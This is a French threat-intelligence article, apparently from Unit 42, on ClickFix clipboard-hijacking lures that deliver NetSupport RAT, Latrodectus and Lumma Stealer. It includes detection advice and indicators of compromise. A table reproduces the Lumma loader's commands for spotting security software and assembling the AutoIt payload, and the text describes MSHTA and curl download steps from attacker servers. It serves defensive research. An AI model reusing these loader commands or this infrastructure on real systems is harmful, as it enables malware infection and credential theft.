Malware

Fixez le clic : prévention du vecteur d’attaque ClickFix

Clock Icon 16 minutes de lecture
Related Products
Advanced DNS SecurityAdvanced URL FilteringAdvanced WildFireCloud-Delivered Security ServicesCortexCortex XDRCortex XSIAMUnit 42 Incident Response iconUnit 42 Incident Response

Synthèse

Dans cet article, nous partageons des conseils de détection et des stratégies d’atténuation pour les campagnes ClickFix, ainsi qu’un aperçu des campagnes ClickFix les plus marquantes que nous avons observées jusqu’à présent en 2025 :

  • Les attaquants qui distribuent le cheval de Troie d’accès à distance (RAT) NetSupport intensifient leurs activités avec un nouveau chargeur
  • Les attaquants qui diffusent le malware Latrodectus attirent les victimes par le biais d’une nouvelle campagne ClickFix
  • Campagne Prolific Lumma Stealer ciblant plusieurs secteurs avec de nouvelles techniques

ClickFix est une technique de plus en plus répandue que les acteurs de la menace utilisent dans les leurres d’ingénierie sociale. Cette technique incite les victimes potentielles à exécuter des commandes malveillantes, sous prétexte d’apporter des « solutions rapides » à des problèmes informatiques courants.

Ces campagnes utilisent la réputation de produits et de services légitimes pour dissimuler leurs activités de manière à les rendre plus difficiles à repérer. Cela ne signifie pas que l’auteur du fichier exécutable est fautif ou responsable du résultat causé par le malware.

Les campagnes ClickFix ont eu un impact sur des organisations opérant dans divers secteurs, notamment :

  • Haute technologie
  • Services financiers
  • Fabrication
  • Retail et vente en gros
  • Collectivités locales et territoriales
  • Services professionnels et juridiques
  • Services publics et énergie

Unit 42 a récemment participé à près d’une douzaine de cas de réponse à des incidents dans lesquels un leurre ClickFix était le vecteur d’accès initial.

Un leurre ClickFix efficace pourrait permettre aux acteurs de la menace de prendre le contrôle complet de l’organisation ciblée. Ces leurres peuvent être assez simples à préparer pour les acteurs de la menace, laissant les organisations vulnérables à la collecte de données d’identification, au vol de courrier et même à des incidents de type ransomware.

Nous avons identifié deux variantes de cette technique :

  • Demander à une cible d’exécuter des commandes malveillantes dans la fenêtre d’exécution en appuyant sur la touche Windows + R (Win+R)
  • Demander à une victime potentielle d’exécuter des commandes malveillantes dans une fenêtre de terminal en appuyant sur la touche Windows + X (Win+X)

Les clients de Palo Alto Networks sont mieux protégés contre les menaces mentionnées dans cet article grâce aux produits et services suivants :

Si vous pensez que votre entreprise a pu être compromise ou si vous faites face à une urgence, contactez l’équipe Unit 42 de réponse aux incidents.

Unit 42 - Thématiques connexes Social Engineering, Malware, Malvertising

Analyse en détail de la technique ClickFix

Avant d’examiner la technique ClickFix, il convient de mieux comprendre ce qu’est ClickFix et l’ampleur que cette menace a prise ces derniers mois.

ClickFix est une technique d’ingénierie sociale relativement nouvelle que les acteurs de la menace utilisent de plus en plus dans leurs campagnes d’attaque. Cette technique incite les utilisateurs ciblés à appliquer des « solutions rapides » à des problèmes informatiques courants, tels que des problèmes de performance, des pilotes manquants ou des erreurs de fenêtres contextuelles. Ces derniers mois, de nombreux leurres utilisant la technique ClickFix ont pris la forme de fausses pages de vérification demandant aux victimes d’effectuer une action avant de pouvoir, soi-disant, accéder à la destination souhaitée.

Les acteurs de la menace utilisent souvent des leurres suivants :

  • Sites web légitimes mais compromis
  • Malvertising
  • Tutoriels YouTube
  • Faux forums d’assistance technique

La technique ClickFix repose sur le détournement du presse-papiers. Les pages web utilisant ClickFix injectent des scripts ou des commandes malveillants dans le presse-papiers d’une victime potentielle et fournissent des instructions pour coller et exécuter le contenu malveillant. Comme la technique ClickFix demande aux utilisateurs de coller le contenu, on parle parfois de « pastejacking ».

Les attaquants utilisent la technique ClickFix comme vecteur d’infection initial et les payloads qui suivent varient ; certains leurres déposent des voleurs d’informations, d’autres déploient des RAT ou désactivent des outils de sécurité. Mais tous reposent sur le fait de convaincre la victime de faire le travail de l’attaquant à sa place : exécuter le code manuellement.

Cette méthode de diffusion permet de contourner de nombreux contrôles de détection et de prévention standard. Il n’y a pas d’exploit, de pièce jointe d’hameçonnage ou de lien malveillant. Au lieu de cela, les victimes potentielles exécutent la commande elles-mêmes, à leur insu, par l’intermédiaire d’un shell système de confiance.

Cette méthode rend les infections par ClickFix plus difficiles à détecter que les téléchargements furtifs ou les droppers de malwares traditionnels. Cependant, les chercheurs peuvent toujours identifier des artefacts pour détecter ces infections.

La croissance globale du phénomène ClickFix

Nous avons surveillé de près les leurres ClickFix au cours des derniers mois et nous avons trouvé des dizaines de variantes qui diffusent plusieurs familles de malwares. La figure 1 montre la répartition des cas par semaine.

Diagramme à barres montrant le nombre d’événements par semaine, de la semaine débutant le 30 décembre 2024 et se terminant le 12 mai 2025. Le nombre d’événements varie de 1 à 126. Des pics importants sont observés durant la semaine débutant le 27 janvier 2025 avec 121 événements, et celle commençant le 24 mars 2025 avec 126 événements.
Figure 1. Cas d’infection hebdomadaires depuis le début de 2025.

Nos chercheurs ont également constaté l’impact de ClickFix sur un large éventail de secteurs d’activité, comme l’indique la figure 2.

Graphique à barres montrant le nombre d’entités par secteur d’activité. Les secteurs représentés, par ordre décroissant, sont les suivants : Haute technologie, Services financiers, Industrie manufacturière, Commerce de gros et de détail, Administrations locales et régionales, Services professionnels et juridiques, Services publics et énergie, Pharmaceutique et sciences de la vie, Hôtellerie et restauration, Télécommunications, Santé, Gouvernement fédéral, Éducation. Blocage des logos de Palo Alto Networks et de Unit 42.
Figure 2. Répartition des secteurs touchés par les leurres ClickFix.

Études de cas

Trois des campagnes les plus importantes que nous avons observées jusqu’à présent en 2025 montrent comment les acteurs de la menace ont intégré ClickFix dans la chaîne d’attaque de diverses familles de malwares.

NetSupport RAT change sa méthode de distribution

Lors de la recherche d’activités liées à ClickFix, nous avons identifié une campagne particulièrement prolifique, active en mai 2025. Dans le cadre de cette campagne, les attaquants utilisant NetSupport RAT ont touché plusieurs secteurs d’activité, dont les suivants :

  • Santé
  • Services juridiques
  • Télécommunications
  • Retail
  • Exploitation minière

Cette campagne ClickFix distribuant les malwares NetSupport RAT utilise des domaines de distribution qui se font passer pour des services légitimes et bien connus :

  • DocuSign : une plateforme numérique permettant de signer, d’envoyer et de gérer des documents par voie électronique.
  • Okta : une plateforme qui aide les entreprises à gérer et à sécuriser l’accès des utilisateurs aux applications et aux systèmes. Elle fournit des services d’authentification unique (SSO), d’authentification multifactorielle et de gestion des identités.

Les acteurs de la menace abusent souvent des produits légitimes, en tirent parti ou les détournent à des fins malveillantes. Cela ne signifie pas que le produit légitime est défectueux ou malveillant.

Les figures 3 et 4 montrent les fausses pages de renvoi de DocuSign et d’Okta :

Page de renvoi usurpée de PandaDoc, présentant l’alternative à la signature de documents, soulignant la facilité et la rentabilité, avec divers badges industriels et logos de marques de confiance.
Figure 3. Page de renvoi factice de DocuSign à docusign.sa[.]com.
Capture d’écran d’une page de vérification de sécurité usurpée comportant une case à cocher intitulée « Confirmez que vous n’êtes pas un robot », avec un logo Cloudflare en dessous. Le message indique que le site doit vérifier la sécurité de votre connexion avant de poursuivre.
Figure 4. Page de renvoi factice d’Okta à oktacheck.it[.]com.
Nous soupçonnons cette campagne ClickFix de distribuer le malware RAT NetSupport par l’intermédiaire de l’infrastructure ClearFake. Nos soupçons se fondent sur les similitudes entre le leurre ClickFix et l’infrastructure ClearFake. Tous deux contiennent les mêmes commentaires en russe et utilisent la même fonctionnalité JavaScript d’injection dans le presse-papiers.

ClearFake est un framework JavaScript malveillant déployé sur des sites web compromis dans le cadre de campagnes de téléchargement furtif utilisées par d’autres souches de malware. La figure 5 illustre ClearFake injectant une commande PowerShell codée à l’aide de la fonction JavaScript unsecuredCopyToClipboard. La figure montre également des commentaires en russe dans le code, ce qui nous donne des indices sur les origines du développeur de ClearFake.

Une capture d’écran divisée en deux sections, affichant les étapes de vérification à gauche et du code informatique à droite. Sur la gauche, une interface orange indique à l’utilisateur de suivre des étapes de vérification telles que maintenir la touche Windows enfoncée tout en appuyant sur R, puis valider en appuyant sur Entrée. Il s’agit de la première étape. À droite, une interface de codage affiche des lignes de code en rouge et en noir, accompagnées de commentaires en russe, indiquant des modifications apportées à une commande PowerShell. La deuxième étape est la commande PowerShell masquée, injectée via le clavier de l’utilisateur.
Figure 5. Page de renvoi et injection de script dans une page DocuSign factice.

La fausse fenêtre de vérification affiche des instructions pour ouvrir la boîte de dialogue Run et y coller le contenu du presse-papiers, l’interface présentant ces instructions comme un test prouvant que l’utilisateur n’est pas un robot. La victime peut ignorer la commande PowerShell malveillante que le site web injecte par la suite (comme indiqué ci-dessus, il s’agit d’un exemple de pastejacking).

Une fois exécutée, la commande télécharge un autre script PowerShell qui télécharge et exécute l’étape suivante de l’attaque. La chaîne d’infection est décrite dans la figure 6.

Organigramme illustrant une cyberattaque impliquant de fausses invites d’un site Okta contrefait, l’exécution de cmd.exe et de PowerShell pour télécharger et exécuter des malwares, dont NetSupport RAT et divers fichiers exécutables, aboutissant à l’injection et à l’exfiltration de données.
Figure 6. La chaîne d’infection NetSupport RAT.

L’étape suivante est contenue dans une archive ZIP, qui comprend toutes les dépendances légitimes nécessaires à l’exécution de jp2launcher.exe. Ce fichier est un composant légitime de l’environnement d’exécution Java (JRE) utilisé pour lancer des applications Java, comme le montre la figure 7.

Capture d’écran d’un ordinateur affichant une liste de fichiers principalement liés aux composants et applications de Microsoft Windows. Chaque entrée de fichier indique le nom du fichier, la date de modification, le type et la taille. Trois lignes sont mises en évidence dans un encadré rouge.
Figure 7. Contenu de l’archive ZIP téléchargée par cmd.exe.

Tout d’abord, cmd.exe télécharge l’archive ZIP, extrait son contenu et l’enregistre dans le répertoire %APPDATA%/Local/Temp/. Ensuite, cmd.exe lance jp2launcher.exe, qui transfère un chargeur malveillant nommé msvcp140.dll. L’annexe de cet article fournit une analyse technique complète du nouveau chargeur de NetSupport RAT basé sur un fichier DLL.

Enfin, le fichier DLL télécharge et exécute une archive ZIP qui contient NetSupport RAT (client32.exe) et les fichiers associés. NetSupport RAT est un logiciel légitime, mais les copies obsolètes ou volées sont souvent utilisées à mauvais escient par différents acteurs de la menace, généralement configurées comme un malware RAT pour l’infiltration et l’infection des terminaux.

Latrodectus déploie de nouveaux leurres ClickFix pour piéger ses victimes

En mars-avril 2025, nous avons constaté une augmentation du trafic vers les domaines contrôlés par Latrodectus. Nous avons également constaté un changement dans la stratégie d’infection, les attaquants distribuant Latrodectus ayant commencé à utiliser la technique ClickFix dans leurs vecteurs d’accès initial.

La chaîne d’attaque Latrodectus commence lorsqu’une personne visite un site web légitime, mais compromis. Ensuite, l’infrastructure ClearFake redirige le visiteur du site vers une fausse page de vérification. Cette page présente une invite demandant à l’utilisateur d’exécuter une commande via la boîte de dialogue Run, tandis que le backend JavaScript malveillant injecte une commande PowerShell dans le presse-papiers du terminal.

La figure 8 ci-dessous montre le leurre et la chaîne de redirection qui s’ensuit à partir du site compromis.

Capture d’écran d’un ordinateur affichant une page de vérification captcha invitant l’utilisateur à effectuer les étapes à l’aide de raccourcis clavier. L’écran affiche également les outils de développement web ouverts dans le navigateur, avec divers noms de scripts visibles.
Figure 8. Leurre Latrodectus ClickFix.

Lorsque les victimes collent et exécutent la commande injectée, elles ne voient pas la commande elle-même. Ce qu’elles voient, c’est le commentaire à la fin du script (Cloud Identificator: 2031), qui semble faire partie d’un processus d’authentification normal. Cependant, une fois exécuté, le script utilise curl.exe pour télécharger un fichier JavaScript à partir d’un serveur C2. Il exécute ensuite le fichier via Cscript, comme l’indique la figure 9.

Extrait de code avec surlignage syntaxique en mode sombre, comportant certaines zones caviardées pour des raisons de confidentialité.
Figure 9. Une commande malveillante injectée à partir d’un leurre ClickFix dans le presse-papiers de la cible.

Depuis son apparition à la mi-2024, les attaquants ont souvent diffusé Latrodectus par le biais d’une chaîne comprenant un fichier JavaScript malveillant téléchargeant un fichier Microsoft Software Installer (MSI) qui dépose Latrodectus. Dans ce cas, le fichier JavaScript exécuté (la.txt) récupère un fichier MSI sur un serveur distant et l’exécute à l’aide de msiexec.exe.

Contrairement aux campagnes précédentes où le téléchargeur JavaScript était généralement surchargé et obscurci par des commentaires absurdes, cette variante utilise de grandes variables JSON de pacotille qui portent des noms apparemment légitimes, tels que var_Apple_Palantir38 et func_Slack_encryption84. La figure 10 compare les techniques d’obscurcissement utilisées dans les campagnes passées et récentes de Latrodectus.

Deux images côte à côte montrant des scripts de code : celle de gauche montre un extrait contenant des variables et des fonctions, tandis que celle de droite présente un bloc de code avec une boucle et des instructions.
Figure 10. Comparaison entre les techniques d’obscurcissement récentes (à gauche) et plus anciennes (à droite) utilisées dans les droppers Latrodectus.

Le payload MSI dépose plusieurs fichiers sur le disque de la victime. Il s’agit notamment de Latrodectus, qui se présente sous la forme d’un fichier DLL malveillant (libcef.dll) et d’un fichier binaire légitime qui transfère le fichier DLL. Ceci est illustré par la figure 11.

Diagramme de la chaîne d’infection Latrodectus, commençant par un site web légitime compromis et passant par la tactique ClickFix, menant au téléchargement et à l’exécution d’un fichier EXE et d’un code shell malveillant.
Figure 11. La chaîne d’infection Latrodectus.

Lorsque le fichier légitime transfère le fichier DLL malveillant pour Latrodectus, il s’injecte un code shell.

Dans un article de mai 2025 de Timely Threat Intelligence, nous avons analysé une campagne Latrodectus similaire, dans laquelle Lumma Stealer servait de payload final pour la chaîne d’attaque complète.

Campagne de typosquattage Lumma Stealer

Les attaquants qui diffusent Lumma Stealer ont commencé à utiliser la technique d’infection ClickFix à la fin de l’année 2024. Nous avons constaté une augmentation des tentatives d’infection par ClickFix pour Lumma Stealer pas plus tard qu’en avril 2025. Au cours des dernières campagnes, les attaquants distribuant Lumma Stealer ont touché un large éventail de secteurs, dont les suivants :

  • Automobile
  • Énergie
  • IT
  • Logiciel

Notre enquête sur l’une de ces campagnes ClickFix a révélé que les cibles sont invitées à copier une commande MSHTA unique avec la structure suivante : mshta xxxx[.]co/xxxxxx =+\xxx.

Les attaquants attribuent à chaque cible une chaîne d’identification spécifique, qu’elle peut utiliser pour recevoir le payload une fois. Cependant, les URI vérifiés par nos chercheurs ne délivraient plus les payloads après l’infection.

Lors de l’exécution du script ClickFix, le script redirige l’utilisateur vers une version typosquattée des domaines IP Logger iplogger[.]org et iplogger[.]com. IP Logger est un service de raccourcissement d’URL et de suivi d’adresses IP qui crée des liens pour enregistrer des informations sur les visiteurs, notamment :

  • Adresses IP
  • Géolocalisation
  • Détails de l’appareil
  • Comportement de navigation

Le domaine typosquatté contrôlé par les attaquants est iplogger[.]co, et la page de ce domaine est déguisée en un service connu et légitime.

Dans tous les cas de la campagne, nous avons observé que la commande MSHTA téléchargeait un script PowerShell codé, qui déclenchait une infection par Lumma Stealer. La figure 12 illustre l’ensemble de la chaîne d’infection.

Infection Lumma Stealer décrivant le processus d’une attaque par malware impliquant des entités telles que ClickFix, Encoded PowerShell, Lumma Stealer et diverses fonctions telles que la prise de contact avec le serveur C2 (Command and Control), le développement de fichiers exécutables et la détection de produits de sécurité. Le graphique montre les connexions et les actions telles que l’abandon de ressources et l’exécution de commandes tout au long du cycle de vie de l’attaque.
Figure 12. La chaîne d’infection Lumma Stealer.

Chaque lien contrôlé par l’attaquant dissimule une commande PowerShell lourdement obscurcie et encodée en Base64. À l’issue de son exécution, cette commande déclenche le téléchargement et le lancement d’un programme malveillant baptisé PartyContinued.exe, servant de passerelle au célèbre voleur d’informations Lumma Stealer. Cet exécutable est hébergé à l’adresse suivante : hxxps[:]//pub-<série de chiffres générée dynamiquement>.r2[.]dev et est nommé de manière à ressembler à une URL de développeur légitime.

Lorsque PartyContinued.exe est lancé, il met en place une nouvelle méthode de chargement Lumma qui utilise un langage de script appelé AutoIt. Cette version de Lumma Stealer est similaire aux versions précédentes, mais elle inclut un nouveau fichier CAB (Microsoft Cabinet Archive) nommé Boat.pst. Ce fichier CAB est intégré à PartyContinued.exe et contient le reste du contenu utilisé pour créer un moteur de script AutoIt3 et un script AutoIt qu’il exécute pour Lumma Stealer.

Le tableau 1 résume les commandes exécutées par le chargeur et leur objectif :

Commande Description Objectif
tasklist | findstr /I "opssvc wrsa" Effectue une recherche insensible à la casse pour opssvc ou wrsa dans le nom d’un processus en cours d’exécution. Détection des logiciels de sécurité des terminaux
tasklist | findstr "bdservicehost SophosHealth AvastUI AVGUI nsWscSvc ekrn" Recherche diverses chaînes de caractères dans les processus en cours d’exécution. Détection des logiciels de sécurité des terminaux
cmd /c md 386354 Crée un répertoire pour enregistrer le malware sur le disque. Définition de l’emplacement pour l’extraction de payloads
extrac32 /Y /E Boat.pst Extrait les fichiers du fichier .cab nommé Boat.pst, en écrasant les fichiers existants (/Y) et en extrayant tous les fichiers (/E). Extraction de payloads
set /p ="MZ" > 386354\Slovenia[.]com <nul Crée un fichier nommé Slovenia[.]com dans le répertoire 386354 contenant deux octets pour les caractères MZ. Construction de l’exécuteur AutoIt3
findstr /V "Tr" Bell >> 386354\Slovenia[.]com Ajoute toutes les lignes du fichier extrait nommé Bell qui ne contiennent pas la chaîne Tr (sensible à la casse) au fichier Slovenia[.]com. Construction de l’exécuteur AutoIt3
cmd /c copy /b 386354\Slovenia[.]com + Sewing + Monetary + Covered + Health + Loss + Intel + Escape + Tramadol + Apparatus 386354\Slovenia[.]com Ajoute d’autres fichiers extraits pour terminer la création d’un fichier binaire en utilisant copy /b. Le résultat est une copie de AutoIt3.exe, renommée pour l’occasion en Slovenia[.]com. Construction de l’exécuteur AutoIt3
cmd /c copy /b ..\Presently.pst + ..\Instantly.pst + ..\Roy.pst + ..\Tolerance.pst + ..\Mailto.pst + ..\Marco.pst + ..\Mint.pst G Crée un fichier binaire nommé G que Slovenia[.]com exécute en tant que script compilé AutoIt v3 (.a3x). Construction du payload de Lumma Stealer (exécution du fichier binaire sous la forme d’un fichier .a3x)
start Slovenia[.]com G Commande pour l’exécuteur AutoIt3 afin d’exécuter le fichier binaire pour Lumma Stealer en tant que fichier .a3x. Chargement/exécution de Lumma Stealer
choice /d y /t 5 Commande permettant de sélectionner oui (y) pour l’option par défaut (/d) pour les commandes du fichier .bat après avoir attendu 5 secondes (/t 5). Permet à Lumma Stealer de fonctionner sans aucune interaction avec l’utilisateur

Tableau 1. Commandes exécutées par le chargeur pour Lumma Stealer.

Comme le montre le tableau, Slovenia[.]com est une copie du moteur de script AutoIt3 (AutoIt3.exe) qui exécute un fichier binaire lancé en tant que script AutoIt (.a3x) nommé G, qui est responsable des étapes suivantes de l’attaque. Cette version de Latrodectus collecte des informations sensibles, notamment les mots de passe des navigateurs basés sur Chromium, et tente de les exfiltrer vers un serveur C2 à l’adresse sumeriavgv[.]digital.

À la poursuite des infections ClickFix

Les attaques ClickFix laissent souvent des traces facilement détectables, en particulier lorsque les personnes qui consultent ces leurres ne sont pas habituées à ouvrir des interfaces d’administration, ce qui les incite à coller une chaîne de commande malveillante dans une fenêtre d’exécution.

Examen des artefacts RunMRU

Windows conserve une clé de registre qui stocke les dernières commandes exécutées à partir de la fenêtre d’exécution (Win + R), appelée RunMRU :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Cette clé de registre enregistre toutes les commandes exécutées à partir de la fenêtre d’exécution, ce qui permet aux experts d’analyser ces entrées à la recherche de signes d’utilisation suspecte.

Voici quelques indicateurs clés d’un contenu RunMRU suspect :

  • Contenu obscurci
  • Mots-clés liés au téléchargement et à l’exécution de payloads provenant de domaines inconnus ou suspects
  • Mots-clés indiquant les appels aux interfaces administratives

Ces entrées indiquent que quelqu’un a pu déclencher manuellement ces commandes, ce qui correspond à un flux d’infection par ClickFix.

Détection de ClickFix : variante Win + X

Certains attaquants cherchent à éviter d’exposer leur activité dans la clé de registre RunMRU. Ils présentent à la place des instructions pour lancer un terminal pour PowerShell (Windows 11) ou Command Prompt (Windows 10) via Win+X, qui ouvre le menu d’accès rapide. Un rapport de mars 2025 révèle que les attaquants qui ont diffusé Havoc ont utilisé cette variante Win+X de ClickFix.

Les analystes de menaces peuvent rechercher des signes de cette technique ClickFix via Win+X en analysant la télémétrie des solutions EDR ou les journaux d’événements Windows; notamment :

  • Événement de sécurité ID 4688 (création de processus) : Recherchez le fichier powershell.exe généré par explorer.exe, en corrélation avec l’ID d’événement 4663 (accès aux objets) des fichiers du dossier %LocalAppData%\NMicrosoft\NWindows\NWinX\N.
  • Modèles d’utilisation de shell : Les sessions PowerShell avec les privilèges élevés, lancées peu après une connexion interactive, suivies de connexions réseau ou de processus enfants suspects (par exemple, certutil.exe, mshta.exe et rundll32.exe), constituent souvent des signaux d’alerte.
  • Surveillance du presse-papiers : Comme les leurres ClickFix reposent sur le fait que les victimes potentielles collent le contenu malveillant du presse-papiers, nous pouvons établir une corrélation entre l’activité de collage et l’exécution de PowerShell peu après que l’utilisateur a appuyé sur Win+X.

Conclusion

La technique ClickFix représente une menace grandissante, dont la mise en œuvre évolue de manière dynamique. Les acteurs de la menace exploitent la technique ClickFix dans des attaques ciblant les organisations, tirant parti des erreurs humaines pour assurer la propagation et la persistance de leurs intrusions.

Cet article a examiné trois campagnes importantes de ClickFix – NetSupport RAT, Latrodectus et Lumma Stealer – qui ne cessent d’évoluer et d’intégrer de nouvelles techniques.

Les méthodes pratiques pour traquer et détecter les leurres ClickFix consistent notamment à analyser la télémétrie des solutions EDR ou les journaux d’événements Windows à la recherche d’événements, d’activités et de schémas suspects.

Il est essentiel pour la sécurité des organisations de s’attaquer de manière proactive à cette menace en constante évolution. À cette fin, des efforts doivent être déployés pour sensibiliser le personnel à la nécessité de se méfier des leurres ClickFix. Ceci devrait être fait tout en mettant en place des mesures de défense et de surveillance fondées sur nos recommandations en matière de traque des menaces.

Les clients de Palo Alto Networks sont mieux protégés contre les menaces mentionnées ci-dessus grâce aux produits suivants :

  • Advanced WildFire
  • Advanced URL Filtering et Advanced DNS Security détectent les attaques ClickFix, telles que celles évoquées dans cet article, à l’aide de nos crawlers de sécurité hors ligne en détectant les commandes malveillantes injectées dans la mémoire tampon du presse-papiers par un JavaScript malveillant
  • Cortex XDR et XSIAM bloquent l’ensemble des campagnes et malwares mentionnés dans cet article grâce au module Behavioral Threat Protection

Si vous pensez que votre entreprise a pu être compromise ou si vous faites face à une urgence, contactez l’équipe Unit 42 de réponse aux incidents ou composez l’un des numéros suivants :

  • Amérique du Nord : Gratuit : +1 (866) 486-4842 (866.4.UNIT42)
  • Royaume-Uni : +44 20 3743 3660
  • Europe et Moyen-Orient : +31.20.299.3130
  • Asie : +65.6983.8730
  • Japon : +81 50 1790 0200
  • Australie : +61.2.4062.7950
  • Inde : 00080005045107

Palo Alto Networks a partagé ces conclusions avec les autres membres de la Cyber Threat Alliance (CTA). Les membres de la CTA s’appuient sur ces renseignements pour déployer rapidement des mesures de protection auprès de leurs clients et perturber de manière coordonnée les activités des cybercriminels. Cliquez ici pour en savoir plus sur la Cyber Threat Alliance.

Indicateurs de compromission

Hachages SHA256 de l’échantillon de Lumma Stealer

  • Nom de fichier PartyContinued.exe : 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef
  • Nom de fichier Boat.pst (un fichier CAB) : 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7

Domaines de l’échantillon de Lumma Stealer

  • iplogger[.]co
  • stuffgull[.]top
  • sumeriavgv[.]digital
  • pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev
  • pub-626890a630d8418ea6c2ef0fa17f02ef.r2[.]dev
  • pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev
  • pub-a5a2932dc7f143499b865f8580102688.r2[.]dev
  • pub-7efc089d5da740a994d1472af48fc689.r2[.]dev
  • agroeconb[.]live
  • animatcxju[.]live

Hachages SHA256 de l’échantillon de Latrodectus

  • Nom de fichier libcef.dll : 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1
  • Téléchargeur PowerShell : 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293
  • Téléchargeur JavaScript : 57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a
  • Téléchargeur JavaScript : 33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559

URL C2 de l’échantillon de Latrodectus

  • hxxps[:]//webbs[.]live/on/
  • hxxps[:]//diab[.]live/up/
  • hxxps[:]//mhbr[.]live/do/
  • hxxps[:]//decr[.]live/j/
  • hxxps[:]//lexip[.]live/n/
  • hxxps[:]//rimz[.]live/u/
  • hxxps[:]//byjs[.]live/v/
  • hxxps[:]//btco[.]live/r/
  • hxxps[:]//izan[.]live/r/
  • hxxps[:]//k.veuwb[.]live/234
  • hxxps[:]//r.netluc[.]live
  • heyues[.]live
  • hxxps[:]//k.mailam[.]live/234234

Hachages SHA256 de l’échantillon de NetSupport RAT

  • Nom de fichier data_3.bin (stager chiffré avec XOR) : 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D
  • Nom de fichier data_4.bin (code shell chiffré avec XOR) : 9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288
  • Nom de fichier msvcp140.dll (chargeur) : CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527
  • NetSupport Loader Mutex :
    nx0kFgSPY8SDVhOMjmNgW
  • libsqlite3-0.dll : 506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a
  • Emplacement du fichier C:\ProgramData\SecurityCheck_v1\client32.exe : 3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7

Domaines pour le chargeur provenant de l’échantillon de NetSupport RAT :

  • oktacheck.it[.]com
  • doccsign.it[.]com
  • docusign.sa[.]com
  • dosign.it[.]com
  • loyalcompany[.]net
  • leocompany[.]org
  • 80.77.23[.]48
  • mhousecreative[.]com

Domaines C2 de l’échantillon de NetSupport RAT :

  • mh-sns[.]com
  • lasix20[.]com

Pour aller plus loin

Annexe : Analyse technique du nouveau chargeur de NetSupport RAT

Cette section s’intéresse de près au nouveau chargeur NetSupport RAT basé sur un fichier DLL, qui représente un plus grand défi pour les analystes que les campagnes précédentes. Dans le passé, NetSupport RAT était chargé par des chargeurs de scripts avec des chaînes d’infection relativement courtes, tandis que ce nouveau chargeur ajoute un niveau supplémentaire de discrétion et de complexité à l’attaque.

L’exemple que nous analysons ici est msvcp140.dll. Ce fichier DLL est transféré par un fichier exécutable légitime nommé jp2launcher.exe.

Ce fichier DLL utilise plusieurs techniques pour compliquer l’analyse, notamment :

  • Résolution dynamique des API
  • Chiffrement des données
  • Obfuscation du code

À titre d’exemple, une fois transféré en douce par jp2launcher.exe, le fichier DLL écrit le code de ses étapes suivantes, octet par octet, directement dans la pile, Ensuite, il désobscurcit et exécute le code.

Après le désobscurcissement initial, le fichier DLL récupère les fichiers binaires chiffrés nommés data_3.bin et data_4.bin sur le serveur C2 via curl.exe et dépose les payloads sur le disque dans le même répertoire de travail. La figure 13 illustre la construction de la commande curl.exe pour télécharger l’un des payloads.

Capture d’écran de HTML avec mise en évidence de la syntaxe montrant diverses commandes telles que mov et push.
Figure 13. Le chargeur malveillant msvcp140.dll construit des commandes curl pour télécharger des fichiers .bin affichés dans le débogueur x64dbg.

Le chargeur enregistre les fichiers data_3.bin et data_4.bin sur le disque en tant que fichiers binaires chiffrés, puis les déchiffre en mémoire à l’aide d’une clé XOR déployée, qui est https://google[.]com/. Le chargeur injecte ensuite le code déchiffré dans un processus enfant de jp2launcher.exe.

Le code déchiffré de data_4.bin est un code shell relativement petit qui charge le code déchiffré de data_3.bin. Ce fichier binaire est un fichier exécutable PE complet qui télécharge le paquet final de NetSupport RAT sous forme d’archive ZIP à partir du serveur C2 de l’attaquant et le décompresse en mémoire. La figure 14 montre la requête du chargeur à hxxp[:]//80.77.23[.]48/service/settings/5702b2a25802ff1b520c0d1e388026f8074e836d4e69c10f9481283f886fd9f4. La demande contient un agent utilisateur unique.

Capture d’écran d’un journal d’ordinateur détaillant les requêtes du serveur HTTP avec les horodatages et les réponses du serveur.
Figure 14. Demande de téléchargement de jp2launcher.exe depuis le serveur C2, téléchargeant client32.exe.

Le payload final est une archive ZIP qui contient NetSupport RAT et toutes les dépendances requises. Le chargeur dépose NetSupport RAT dans C:\ProgramData\SecurityCheck_v1\ et exécute son fichier binaire principal, client32.exe.

Le chargeur met ensuite en place la persistance de RAT en créant une tâche planifiée qui exécute client32.exe chaque fois qu’un utilisateur se connecte.

Lors de l’analyse statique du chargeur, nous avons remarqué un chemin PDB unique, indiquant que ce fichier DLL fait partie d’une certaine série d’outils MsiShell. En explorant cette piste, nous avons découvert un autre exemple de la campagne. Dans ce cas, les attaquants ont utilisé un logiciel de transfert de fichiers légitime, filezilla.exe, et ont procédé à un transfert (sideloading) d’une autre version du chargeur, nommée libsqlite3-0.dll. La figure 15 illustre la similitude entre les chemins PDB des deux versions du chargeur.

Deux captures d’écran montrant des chemins d’accès aux fichiers et des GUID pour des projets logiciels, tous deux étant des artefacts de débogage. Chaque élément est surligné en rouge.
Figure 15. Chemins PDB des deux versions du chargeur NetSupport RAT.

Étiquettes

SOMMAIRE

Sur le même thème

Associé Malware Ressources

A pictorial representation of code assistant LLMs. An open laptop on a desk displaying a complex digital security interface, with ambient red and black lighting in the background.
Recherche sur les menaces

Les assistants de codage IA sous la loupe : risques et abus
Lire l’article Right arrow
Pictorial representation of AdaptixC2. Digital iris with binary code, emphasizing cybersecurity and technology concepts.
Recherche sur les menaces

AdaptixC2 : Un nouveau framework open source exploité activement
Lire l’article Right arrow
Pictorial representation of social engineering. Digital illustration of four human profiles connected by glowing neural network lines against a dark background, symbolizing connectivity and technology.
Rapports de tendances

Rapport global 2025 de Unit 42 sur la réponse à incident : édition spéciale sur l’ingénierie sociale
Lire l’article Right arrow
Pictorial representation of Muddled Libra (Scattered Spider). Illustration of a zodiac symbol Libra represented by scales, set against a cosmic purple background with stars.
